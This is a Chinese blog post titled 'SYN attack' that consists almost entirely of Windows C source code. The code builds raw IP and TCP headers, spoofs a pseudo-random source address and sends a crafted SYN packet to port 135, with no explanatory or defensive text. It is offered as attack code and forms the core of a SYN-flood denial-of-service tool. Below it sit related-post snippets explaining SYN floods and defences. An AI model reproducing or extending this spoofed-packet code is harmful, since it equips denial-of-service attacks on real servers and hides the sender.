SYN攻击

最新推荐文章于 2024-06-20 15:37:09 发布
最新推荐文章于 2024-06-20 15:37:09 发布
阅读量1.1k 收藏
点赞数
分类专栏: 协议分析 文章标签: socket tcp struct buffer include
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/trojanth/article/details/531232
版权

#include <winsock2.h>
#include <ws2tcpip.h>
#include <string.h>
#include <stdio.h>

#pragma comment(lib,"WS2_32.LIB")

typedef struct tag_ipheader   //ip首部
{
 unsigned char ip_verlen;  //4位版本号|4位首部长度
 unsigned char ip_tos;   //ip服务类型
 unsigned short ip_totallength; //总长度
 unsigned short ip_id;   //标识符
 unsigned short ip_offset;  //3位标志--13位分片偏移
 unsigned char ip_ttl;   //生存时间
 unsigned char ip_protocol;  //协议
 unsigned short ip_checksum;  //首部检查和
 unsigned int ip_srcaddr;  //源ip地址
 unsigned int ip_destaddr;  //目的ip地址
}IPHEADER;

typedef struct tag_tcpheadr
{
 USHORT tcp_sport;    //源端口
 USHORT tcp_dport;    //目的端口
 unsigned int tcp_seq;   //32位系列号
 unsigned int tcp_ack;   //32位确认号
 unsigned char tcp_lenres;  //4位首部长度
 unsigned char tcp_flag;   //6位标志位
 USHORT tcp_win;     //16位窗口
 USHORT tcp_sum;     //16位校验和
 USHORT tcp_urp;
}TCPHEADER;

typedef struct tag_psdheader
{
 unsigned long saddr;   //源地址
 unsigned long daddr;   //目的地址
 char mbz;
 char ptcl;      //协议类型
 unsigned short tcpl;   //tcp长度
}PSDHEADER;

USHORT checksum(USHORT *buffer,int size)
{
 unsigned long cksum=0;
 while(size>1)
 {
  cksum = cksum + *buffer++;
  size = size - sizeof(USHORT);
 }
 if(size)
 {
  cksum = cksum + *(UCHAR*)buffer;
 }
 cksum = (cksum >> 16) + (cksum & 0xffff);
 cksum = cksum + (cksum >> 16);
 return (USHORT)(~cksum);
}
int main(int argc,char *argv[])
{
 char ip[] = "127.0.0.1";
 WSADATA WSAData;
 if(WSAStartup(MAKEWORD(2,2),&WSAData))
  return 1;
 SOCKET sock;
 sockaddr_in sock_addr;
 if((sock =socket(AF_INET,SOCK_RAW,IPPROTO_IP))==INVALID_SOCKET)
 {
  printf("socket");
  return 1;
 }
 BOOL flag=true;
 if(setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char*)&flag,sizeof(flag))==INVALID_SOCKET)
 {
  printf("flag");
  return 1;
 }
 int time=888;
 if(setsockopt(sock,SOL_SOCKET,SO_SNDTIMEO,(char*)&time,sizeof(time))==INVALID_SOCKET)
 {
  printf("time");
  return 1;
 }

 sock_addr.sin_family = AF_INET;
 sock_addr.sin_port = htons(135);
 sock_addr.sin_addr.S_un.S_addr = inet_addr("127.0.0.1");

 TCPHEADER tcpHeader;
 IPHEADER ipHeader;
 PSDHEADER psdHeader;

 ipHeader.ip_verlen =(4<<4 | sizeof(ipHeader)/sizeof(unsigned long)); 
 ipHeader.ip_tos = 0;
 ipHeader.ip_totallength = htons(sizeof(ipHeader)+sizeof(tcpHeader));
 ipHeader.ip_id = 1;
 ipHeader.ip_offset = 0;
 ipHeader.ip_ttl =(unsigned char)GetTickCount()%514+620;
 ipHeader.ip_protocol = IPPROTO_TCP;
 ipHeader.ip_checksum = 0;
 ipHeader.ip_srcaddr = htonl(GetTickCount()*1986);
 ipHeader.ip_destaddr = inet_addr(ip);

 tcpHeader.tcp_dport = htons(135);
 tcpHeader.tcp_sport = htons(1986);
 tcpHeader.tcp_seq = htonl(0x12345678);
 tcpHeader.tcp_ack = 0;
 tcpHeader.tcp_lenres = (sizeof(tcpHeader)/4 << 4|0);
 tcpHeader.tcp_flag = 2;
 tcpHeader.tcp_win = htons(232);
 tcpHeader.tcp_sum = 0;
 tcpHeader.tcp_urp = 0;

 psdHeader.saddr = ipHeader.ip_srcaddr;
 psdHeader.daddr = ipHeader.ip_destaddr;
 psdHeader.mbz = 0;
 psdHeader.ptcl = IPPROTO_TCP;
 psdHeader.tcpl = htons(sizeof(tcpHeader));

 char buff[100];
 memset(buff,0x0,sizeof(buff));
 memcpy(buff,&psdHeader,sizeof(psdHeader));
 memcpy(buff+sizeof(psdHeader),&tcpHeader,sizeof(tcpHeader));
 tcpHeader.tcp_sum = checksum((USHORT*)buff,sizeof(psdHeader)+sizeof(tcpHeader));
 memcpy(buff,&ipHeader,sizeof(ipHeader));
 memcpy(buff+sizeof(ipHeader),&tcpHeader,sizeof(tcpHeader));

 int syn = sendto(sock,buff,sizeof(ipHeader)+sizeof(tcpHeader),0,(struct sockaddr far*)&sock_addr,sizeof(sock_addr));
 if(syn == SOCKET_ERROR)
  printf("error");
 else
  printf("ok");
 return 0;
}

trojanth
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
TCP连接的建立和关闭,以及其中的状态转换
RedemptionC的博客
05-19 376
tcp三次握手四次挥手(即tcp连接的建立和关闭 连接建立(三次握手 建立连接的三次握手如上图: 客户端首先向服务端发一个包,tcp header中的syn flag被置为1,并且客户端的tcp(软件)会随机选取一个初始序号作为这个包的序号client_isn(sequence number) 服务端收到客户端的syn包后,为该tcp连接分配接收缓存(receive buffer)和变量(注意,在这一步分配资源导致服务器易受syn flood攻击),然后向客户端发一个包,其中syn flag仍然
TCP 中 Flags 标志位 ACK、SYN 与 seq、ack
ikun 的博客
09-17 6383
ack 只管带上期望位置的字节数据编号,接收端根据接收到的数据长度 + 最近一次 ACK=1 的 seq + 1 作为下次 ack 期望值。循环往复,直到 FIN=1 结束 TCP 连接。
TCP连接的三次握手过程(SYN报文的学习)
weixin_44943389的博客
07-26 2163
TCP协议中,SYN是一个标志位(Flag),用于在建立TCP连接时进行同步步骤。TCP是一种面向连接的协议,建立连接时需要进行"三次握手"过程,而SYN报文在这个过程中起着关键的作用。第三步(客户端发送ACK):最后,客户端收到服务器的SYN+ACK报文后,会发送一个带有ACK标志的TCP报文给服务器,这个报文也不包含实际数据,只有TCP头部。第一步(客户端发送SYN):客户端向服务器发送一个带有SYN标志的TCP报文,该报文中不包含实际数据,只有TCP头部,用于通知服务器客户端想要建立连接。
syn是什么攻击?怎么来防御
最新发布
CDNcdn11的博客
06-20 279
syn是什么攻击?怎么来防御
Kali:SYN简单泛洪攻击(DOS攻击
bin789456的博客
04-23 8082
Kali:SYN简单泛洪攻击原理解析工具原理解析正式攻击思路攻击演示 原理解析 SYN泛洪攻击,利用三次握手的缺陷,让tcp连接始终处于未成功连接的半连接状态。 攻击机仅发出第一次握手,不对返回信息进行确认,服务器由于需要不断处理连接信息,就会占用资源。 一旦攻击机发包速度较快,服务器就会出现崩溃,处于拒绝服务的状态。 工具原理解析 Nmap:扫描存活主机,选择攻击对象。 hping3:构造SYN包并发送的工具,能够指定端口,包头信息,发送速度。 具体手册可以使用-h命令查看,中文手册详解提供以下链接: h
SYN foold攻击原理及解决方法
不会飞的猪的博客
07-10 4999
SYN foold攻击 原理 SYN foold攻击主要针对tcp通信三次握手期间做的手脚,所以要弄懂这个攻击的原理我们首先必须知道tcp三次握手的详细过程 由上图可知tcp三次握手顾名思义要经过三个步骤,这三个步骤分别是 客户端向服务端发送SYN J(同步信号假设序号为J),相当于通知服务端我要开始建立连接了; 服务端收到客户端的SYN J信号后将发送确认信号ACK J+1和一个新的同步信号...
syn重发_SYN攻击
weixin_39668408的博客
12-20 288
TCP协议之前已经介绍过TCP三次握手相关知识.本文主要介绍利用TCP协议栈三次握手弱点来进行网络攻击SYN攻击TCP协议建立连接的时候需要双方相互确认信息,来防止连接被伪造和精确控制整个数据传输过程数据完整有效。这样就造成TCP连接的资源消耗,其中包括:数据包信息、条件状态、序列号等。SYN攻击通过故意不完成建立连接所需要的三次握手过程,造成连接一方的资源耗尽。握手协议中的相关概念半连接在三...
python syn攻击
03-14
用python语言实现 syn flood攻击
SYN攻击常用命令
10-16
在深入探讨SYN攻击及其常用命令之前,我们首先需要理解SYN攻击的基本概念与机制。SYN攻击,全称为Synchronous SYNchronize Flood Attack,是一种常见的网络攻击手段,主要用于耗尽目标服务器的资源,导致其无法正常...
基于Linux平台防止IP欺骗的SYN攻击防火墙的设计与实现 (2014年)
06-01
IP欺骗是常用的方式,如何防止IP欺骗的SYN攻击成为研究热点。设计是以redhat5.0 为平台,结合RED算法设计并实现一个抗SYN攻击的包过滤防火墙,该防火墙在轻度和中度攻击的情况下判断一个数据包的丢弃概率,当被丢弃则...
syn攻击vc++源码
02-24
syn攻击 vc++ 源码,visual studio新建控制台程序编译即可
操作系统安全:防syn 攻击优化配置.docx
06-02
操作系统安全,特别是针对SYN攻击的防御,是网络服务稳定性的重要保障。SYN攻击TCP/IP协议栈中的一种拒绝服务(DoS)攻击方式,它利用TCP三次握手过程中的漏洞,通过伪造大量的SYN请求,使得服务器资源耗尽,无法...
什么是 SYN 攻击?如何避免 SYN 攻击
Hoshea_sun的博客
03-27 2201
SYN 攻击方式最直接的表现就会把 TCP 半连接队列打满,这样,导致客户端无法和服务端建立连接。方式一:调大 netdev_max_backlog当网卡接收数据包的速度大于内核处理的速度时,会有一个队列保存这些数据包。控制该队列的最大值如下参数,默认值是 1000,我们要适当调大该参数的值,比如设置为 10000方式二:增大 TCP 半连接队列方式三:开启 net.ipv4.tcp_syncookiescookieaccpet()
TCP第三次握手失败的处理(Server端超时重传机制、RST包响应、SYN攻击
热门推荐
lzf的博客
03-09 1万+
作者:骨气 链接:https://www.nowcoder.com/discuss/8081?type=1&order=0&pos=105&page=1 来源:牛客网 当客户端收到服务端的SYN+ACK应答后,其状态变为ESTABLISHED,并会发送ACK包给服务端,准备发送数据了。如果此时ACK在网络中丢失,过了超时计时器后,那么Server端会重新发送SYN+ACK包,重传次数根据
什么是SYN攻击,被SYN攻击了要如何处理
qq_39885150的博客
07-03 2863
SYN攻击常见于游戏类,是最常见又最容易被利用的一种攻击手法。SYN是属于DOS攻击的一种,它通过利用TCP协议缺陷,通过发送大量的半连接请求,耗费CPU和内存资源。为了形成足够强大的流量,攻击者往往利用中病毒、木马的机器组织流量攻击,直至目前服务器瘫痪。 遭到SYN攻击该如何防御呢? 1、过滤网关防护 这里的过滤网关主要指明防火墙和路由器。过滤网关防护主要包括超时设置,SYN网关和SYN代理三种。 (1)网关超时设置: 网关超时参数设置不宜过小也不宜过大,需根据网络应用环境来设置此参数。 (2)SYN网关
什么是SYN攻击,有什么办法防御SYN攻击
dexunyun的博客
04-06 2342
在一个SYN Flood攻击中,攻击者发送大量伪造的TCP连接请求(SYN数据包),使得目标服务器不断响应这些请求并且维护TCP连接,最终导致服务器资源耗尽无法响应合法的连接请求从而实现拒绝服务攻击。1、高防服务器:高防服务器配有专门定制的硬件防火墙,通过拦截恶意流量手段来有效防御SYN Flood攻击,同时,可以在防火墙上设置SYN转发超时参数,使其远小于服务器的timeout时间,从而及时丢弃无效的SYN请求,有效地阻挡来自恶意IP地址的SYN包。因此,延缓TCB的分配可以有效地减轻服务器资源的消耗。
【每日一题】9.14 什么是SYN攻击?如何避免?
小刘的技术成长站
09-15 234
SYN攻击就是Client在短时间内伪造大量不存在的IP地址,并向Server不断地发送SYN包,Server则回复确认包,并等待 Client确认,由于源地址不存在,因此Server需要不断重发直至超时,这些伪造的 SYN包将长时间占用未连接队列,导致正常的SYN请求因为队列满而被丢弃,从而引起网络拥塞甚至系统瘫痪。检测SYN攻击非常的方便,当你在服务器上看到大量的半连接状态时,特别是源IP地址是随机的,基本上可以断定这是一次SYN攻击。3、常见的防御SYN 攻击的方法?1、SYN攻击是什么?
TCP FLAG 标记
grmsu的专栏
07-29 2201
TCP FLAG 标记基于标记的TCP包匹配经常被用于过滤试图打开新连接的TCP数据包。TCP标记和他们的意义如下所列:* F : FIN - 结束; 结束会话* S : SYN - 同步; 表示开始会话请求* R : RST - 复位;中断一个连接* P : PUSH - 推送
什么是 SYN 攻击?如何防范 SYN 攻击?
11-17
SYN攻击是一种利用TCP协议缺陷的攻击方式,攻击者发送大量伪造的TCP连接请求,占用服务器资源,导致合法的TCP连接请求无法被处理,从而使得服务器无法正常工作。为了防范SYN攻击,可以采取以下措施: 1.使用防火墙:...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值